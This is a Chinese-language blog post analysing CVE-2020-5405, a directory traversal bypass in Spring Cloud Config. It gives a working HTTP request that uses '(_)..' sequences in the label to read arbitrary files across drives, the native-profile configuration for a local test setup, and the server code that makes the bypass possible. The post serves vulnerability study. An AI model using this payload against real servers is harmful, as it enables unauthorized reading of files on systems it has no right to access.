CVE-2020-5405 Spring Cloud Config 目录穿越漏洞分析

CVE-2020-5405 Spring Cloud Config 目录穿越漏洞分析

CVE-2020-5405 分析

先放 本地 poc：

GET /1/1/(_)..(_)..(_)c:/Temp/1.txt HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

然后需要更改本地环境 这个 cve 是 19 年上一个 cve 的绕过，不过不同的是 19 年的官方 demo 配置是绕不过的。

本地环境设置

在 resources 文件夹下面的 configserver.yml 设置如下

info:
  component: Config Server
spring:
  profiles:
    active: native
  application:
    name: configserver
  autoconfigure.exclude: org.springframework.boot.autoconfigure.jdbc.DataSourceAutoConfiguration
  jmx:
    default_domain: cloud.config.server
  cloud:
    config:
      server:
        native:
          search-locations:
            - file:///c:/T1emp
server:
  port: 8888
management:
  context_path: /admin

需要开启 active 为 native，然后指定一个 search-locations。

这次的绕过其实本质上是在上一个漏洞检查 path 的基础上，在 label 上通过特殊的方法，穿越了目录从而达到了任意文件读取。

根据这次的 poc，可以看到，retrieve方法下面：

  if (name != null && name.contains("(_)")) {
   // "(_)" is uncommon in a git repo name, but "/" cannot be matched
   // by Spring MVC
   name = name.replace("(_)", "/");
  }
  if (label != null && label.contains("(_)")) {
   // "(_)" is uncommon in a git branch name, but "/" cannot be matched
   // by Spring MVC
   label = label.replace("(_)" , "/");
  }

通过(_)在后端替换成/来达到目录穿越。 所以这次的 poc 是 path 固定为一个文件，在 label 上用..来跳跃

看到图里的!isInvalidPath(local) && !isInvalidEncodedPath(local)应该是可以知道我找个版本是打了上次 19 年穿越漏洞的补丁的。 可以跨盘符读取。

本文使用 mdnice 排版